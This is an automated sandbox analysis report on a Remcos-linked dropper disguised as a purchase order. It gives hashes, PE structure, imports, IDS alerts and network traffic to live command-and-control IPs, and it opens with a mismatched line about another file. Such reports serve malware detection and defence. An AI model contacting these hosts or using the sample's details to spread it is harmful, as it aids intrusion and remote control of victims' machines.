• Filename: PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe, Detection: malicious
Reputation: moderate, very likely benign file
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 676214
Entropy (8bit): 7.803571756354754
Encrypted: false
SSDEEP: 12288:ORqeNjN24O1o46FW+iLOWIRKiKuI+v8nbDVJNtjzFwZnayIjYa9iXb8TOM:Ejoo7W+1WU2Y0nPVJNJlTYXYiM
MD5: 5E1C814FC675448C381899D325ABA145
SHA1: 46A9E1B34F90D4BE128FC1B6F1D698D79C93297B
SHA-256: BF065B1F51EB32228108A6508FF649143A97526A06B27FA6771A85246B162F84
SHA-512: EA3BEFC73DB84C42834E59198F5DD416B738C33FD1105384FF87031205888A018DA7D124582D25ED8A8CEA8567EF07051D1EE6FA77FE4C4B74688BCAA1E88338
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 11%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@.......................................@..................................t...........T...........................................................................p...............................text....^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....T.......V...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 27
Entropy (8bit): 4.134336113194451
Encrypted: false
SSDEEP: 3:iGAeSMn:lAeZ
MD5: 7AB6006A78C23C5DEC74C202B85A51A4
SHA1: C0FF9305378BE5EC16A18127C171BB9F04D5C640
SHA-256: BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
SHA-512: 40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
Malicious: false
Preview: [Access]..Setting=Enabled..

Process: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
File Type: Apple DiskCopy 4.2 image , 589824 bytes, 0x1b00d600 tag size, GCR CLV ssdd (400k), 0x1 format
Category: dropped
Size (bytes): 146780
Entropy (8bit): 4.615458162169198
Encrypted: false
SSDEEP: 1536:dUME4XTG9/8KSneZDa5+94h7hcR6q1QM8cULVTq/O3V+qNwjfhU2o:dRDXTMM2W5+9w7SnGteWHwdUv
MD5: 7A6837390B1EF89D7B9A5DF07DB64AC4
SHA1: 8250AAC9A92F26A4D9D3C433488EBD4A1BB8E57F
SHA-256: 5E6C4D3BC544D45AED600E922BA4AEAA6FD3EA88B80FAC69ABF5D1280D4990AB
SHA-512: 2598386410A3D159D2DC4E1AF1789E807FD7C56699BC00C91DBB8B774FCF193BDEF9C57E705AE2FBC2992C5614FBD7D2E916A1806E834998A85FB4061E58D36A
Malicious: false
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):300355
                                                                                                    Entropy (8bit):7.4995353901755175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:db1+gBbz+rhxKt4vJRY9AWZLW8bRkx11lDHli51GrDFXxthZi:db1+gBbz+rhxKS7LWZSMRkx11lDHli5z
                                                                                                    MD5:93DE41A0E6EDC0B539E7E7E94D03D757
                                                                                                    SHA1:353EE65733321F8DBC41FF7354950ACF319E2753
                                                                                                    SHA-256:6E9AD72F1A8114704599F1DEFE38E18A2ADE105A005A49456DA71FB388FF7577
                                                                                                    SHA-512:0BA06C5872ADD52338F5ABB39601A90A79A1FCE07EE8B8E71733AAFA9C396DC0A6B2057DB81F3E936192A3053F908EC66069987B2B57B7A409F0D9283D89496E
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):234233
                                                                                                    Entropy (8bit):1.2610900601867552
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:5hBRH0NvoO/tUtNHcpmob8fw+bjubeCDu0EUAK5r/Zolpmo6quOGXBD3mBziYKkq:550NkHEmobD+2FALA064/m7h
                                                                                                    MD5:6660188AB1EA377E82BDD257689C526D
                                                                                                    SHA1:976D7478687D50AA64111522DFDED59C12E8CAA6
                                                                                                    SHA-256:D9BE1BBC1FA96E241CCA3A1AC05A0399577F0791B56C24430D5259B9144ACC7C
                                                                                                    SHA-512:2A67D6F53F0FC743872EB97ED7A3E9320369C3253413DE0AB7CD56B9EAF7653BE03C1E123C1A805D707CF1B55C6730EE09780215798B5F6E7FF0D722794087C3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):343449
                                                                                                    Entropy (8bit):1.2554189222827585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:PFQBtMFEp5oCGzvCJFJrv+H/krJpBi0m1PbtFXenyx66vr1zYCDMDWBWcjW+/TBa:GBwvCQkMrlrDs9ES6hOh
                                                                                                    MD5:96A8F104A3C5E3B0AEC79FC7430BECFE
                                                                                                    SHA1:7B178AC27BB5B0F4826C492DB3A9E3AF96F42C17
                                                                                                    SHA-256:3CD846840186FEECC625E3970560C5756BCD7B64686972762654C005DF9F4456
                                                                                                    SHA-512:63611074F88FDD11B998F1BE7F7F14A5BA8E6261D2323BC66547F23EB29311A9E725F380BC5A0333E3A5737F1BEB09691F314EDB5674A6CFFD924FDC6228D678
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, progressive, precision 8, 2501x1667, components 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55850
                                                                                                    Entropy (8bit):7.417058492746941
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bMEcc6tobCtPo6vQvXu8AJAln7d1fvgHuGK81W9bXcUqIFQQ7l4nD9MYBnHa:IEcc6ptbvQvu67d1fiKCWd/FQQ7U9Tn6
                                                                                                    MD5:592A0CB66D2C141B51DEF6CA4A58BB97
                                                                                                    SHA1:1E1E3AB6A4334C3AE2FE88BFC38E4DB11CF8DD84
                                                                                                    SHA-256:0F2E46BAEDB6FD406BEA3989695015C6C1A6D38968541254D8FFAA672374EA0C
                                                                                                    SHA-512:6E4BDCA7CC9AF91DCE1F011D3B6E7321004E3B5D785534314890A90CACC347E83D13377BC327A52BD26ED8BB60DEFD5EE3CD2ADAAA6A86FEFE8F0699C8A5DF0B
                                                                                                    Malicious:false
                                                                                                    Preview:......JFIF.............C.........................................................................................................................0......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    File Type:GTA audio index data (SDT)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):152193
                                                                                                    Entropy (8bit):1.261317213675428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:KK+LJq+PH3HUdZe54Qb1w5RypJZltevJwQ5SuPWsj4GC3mukewFhVl8l6G7jddq4:TvAb3OqT5r
                                                                                                    MD5:97BE27644CEA82513B31E823BA8BFE6A
                                                                                                    SHA1:DE25AD32369F214AA6AC8F2FA34E577BC5D4E282
                                                                                                    SHA-256:BE77A08B612586789B015D3C2D463D71EA2A9CDCB3255CCF8A4F7456BEDF9917
                                                                                                    SHA-512:F2A53862BD0AFD9DAFB653D8BA703FFB3C94FF6C98F5C8A19C3F55444BA23AD7854A8307AAEE41CAB23C3CCDD4B7C6145070C57D9AED9D43AFEB467E5247E3AF
                                                                                                    Malicious:false
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                    Entropy (8bit):7.803571756354754
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:Purchase-Order27112024.scr.exe
                                                                                                    File size:676'214 bytes
                                                                                                    MD5:5e1c814fc675448c381899d325aba145
                                                                                                    SHA1:46a9e1b34f90d4be128fc1b6f1d698d79c93297b
                                                                                                    SHA256:bf065b1f51eb32228108a6508ff649143a97526a06b27fa6771a85246b162f84
                                                                                                    SHA512:ea3befc73db84c42834e59198f5dd416b738c33fd1105384ff87031205888a018da7d124582d25ed8a8cea8567ef07051d1ee6fa77fe4c4b74688bcaa1e88338
                                                                                                    SSDEEP:12288:ORqeNjN24O1o46FW+iLOWIRKiKuI+v8nbDVJNtjzFwZnayIjYa9iXb8TOM:Ejoo7W+1WU2Y0nPVJNJlTYXYiM
                                                                                                    TLSH:99E402A2796182C6C9EB4EF05F62DB7072BDB8AC85C0130F73F76618966239314A915F
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@
                                                                                                    Icon Hash:25eee66466b2bd17
                                                                                                    Entrypoint:0x40335a
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                    Instruction
                                                                                                    sub esp, 000002D8h
                                                                                                    push ebx
                                                                                                    push ebp
                                                                                                    push esi
                                                                                                    push edi
                                                                                                    push 00000020h
                                                                                                    xor ebp, ebp
                                                                                                    pop esi
                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                    mov dword ptr [esp+10h], 00409230h
                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                    call dword ptr [00407034h]
                                                                                                    push 00008001h
                                                                                                    call dword ptr [004070BCh]
                                                                                                    push ebp
                                                                                                    call dword ptr [004072ACh]
                                                                                                    push 00000009h
                                                                                                    mov dword ptr [004292B8h], eax
                                                                                                    call 00007F8A8D117BCAh
                                                                                                    mov dword ptr [00429204h], eax
                                                                                                    push ebp
                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                    push 000002B4h
                                                                                                    push eax
                                                                                                    push ebp
                                                                                                    push 004206A8h
                                                                                                    call dword ptr [0040717Ch]
                                                                                                    push 0040937Ch
                                                                                                    push 00428200h
                                                                                                    call 00007F8A8D117835h
                                                                                                    call dword ptr [00407134h]
                                                                                                    mov ebx, 00434000h
                                                                                                    push eax
                                                                                                    push ebx
                                                                                                    call 00007F8A8D117823h
                                                                                                    push ebp
                                                                                                    call dword ptr [0040710Ch]
                                                                                                    push 00000022h
                                                                                                    mov dword ptr [00429200h], eax
                                                                                                    pop edi
                                                                                                    mov eax, ebx
                                                                                                    cmp word ptr [00434000h], di
                                                                                                    jne 00007F8A8D114CB9h
                                                                                                    mov esi, edi
                                                                                                    mov eax, 00434002h
                                                                                                    push esi
                                                                                                    push eax
                                                                                                    call 00007F8A8D117273h
                                                                                                    push eax
                                                                                                    call dword ptr [00407240h]
                                                                                                    mov ecx, eax
                                                                                                    mov dword ptr [esp+1Ch], ecx
                                                                                                    jmp 00007F8A8D114DABh
                                                                                                    push 00000020h
                                                                                                    pop edx
                                                                                                    cmp ax, dx
                                                                                                    jne 00007F8A8D114CB9h
                                                                                                    inc ecx
                                                                                                    inc ecx
                                                                                                    cmp word ptr [ecx], dx
                                                                                                    Programming Language:
                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x254e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ec6 | 0x6000 | 60ec0c4d80dd6821cdaced6135eddfd5 | False | 0.6593424479166666 | data | 6.438901783265187 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202f8 | 0x600 | 99cdd6cde9adee6bf3b24ee817b4574b | False | 0.4830729166666667 | data | 3.8340327961758165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4a000 | 0x254e0 | 0x25600 | 3a1bbeac9e2615962dd6892f6486190b | False | 0.6265677257525084 | data | 6.670974331190769 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4a3b8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.33201230332426357
RT_ICON | 0x5abe0 | 0xe47b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9978287257868732
RT_ICON | 0x69060 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.500207468879668
RT_ICON | 0x6b608 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5823170731707317
RT_ICON | 0x6c6b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.6337953091684435
RT_ICON | 0x6d558 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.7590252707581228
RT_ICON | 0x6de00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.7239884393063584
RT_ICON | 0x6e368 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7606382978723404
RT_ICON | 0x6e7d0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.5309139784946236
RT_ICON | 0x6eab8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.5878378378378378
RT_DIALOG | 0x6ebe0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x6ece0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x6ee00 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x6eec8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x6ef28 | 0x92 | data | English | United States | 0.6575342465753424
RT_VERSION | 0x6efc0 | 0x214 | data | English | United States | 0.5338345864661654
RT_MANIFEST | 0x6f1d8 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-27T16:50:31.292241+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49755 | 164.160.91.32 | 443 | TCP
2024-11-27T16:50:39.269061+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49776 | 94.156.227.184 | 2404 | TCP
2024-11-27T16:50:42.081531+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49781 | 94.156.227.184 | 2404 | TCP
2024-11-27T16:50:42.160174+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49782 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                    Nov 27, 2024 16:50:32.434792042 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.434881926 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.434895039 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.434935093 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.441668987 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.441684961 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.441756010 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.441766977 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.441806078 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.448066950 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.448084116 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.448147058 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.448159933 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.448198080 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.712970972 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.712996960 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.713109970 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.713128090 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.713165045 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.719737053 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.719752073 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.719810009 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.719822884 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.719858885 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.726449966 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.726466894 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.726649046 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.727140903 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.727154016 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.727175951 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.727226973 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.727407932 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:32.727483988 CET44349755164.160.91.32192.168.2.6
                                                                                                    Nov 27, 2024 16:50:32.727538109 CET49755443192.168.2.6164.160.91.32
                                                                                                    Nov 27, 2024 16:50:37.717629910 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:37.837713957 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:37.837810040 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:37.841519117 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:37.961536884 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:39.222440958 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:39.269061089 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:39.470101118 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:39.475691080 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:39.595957041 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:39.596095085 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:39.717302084 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.210650921 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.227710009 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:40.347742081 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.352615118 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.354414940 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:40.394074917 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:40.474916935 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.478373051 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:40.482181072 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:40.589602947 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:50:40.602930069 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.709815979 CET8049782178.237.33.50192.168.2.6
                                                                                                    Nov 27, 2024 16:50:40.710481882 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:50:40.710700035 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:50:40.830804110 CET8049782178.237.33.50192.168.2.6
                                                                                                    Nov 27, 2024 16:50:42.026782036 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:42.081531048 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:42.160033941 CET8049782178.237.33.50192.168.2.6
                                                                                                    Nov 27, 2024 16:50:42.160173893 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:50:42.183990955 CET497762404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:42.277873039 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:42.322491884 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:42.344578028 CET24044977694.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:42.443365097 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:42.443491936 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:42.563400030 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.020328999 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.020378113 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.020392895 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.020437002 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:43.020531893 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.020544052 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.020555019 CET24044978194.156.227.184192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.020581007 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:43.020612955 CET497812404192.168.2.694.156.227.184
                                                                                                    Nov 27, 2024 16:50:43.154367924 CET8049782178.237.33.50192.168.2.6
                                                                                                    Nov 27, 2024 16:50:43.154437065 CET4978280192.168.2.6178.237.33.50
                                                                                                    Nov 27, 2024 16:50:43.168701887 CET24044978194.156.227.184192.168.2.6
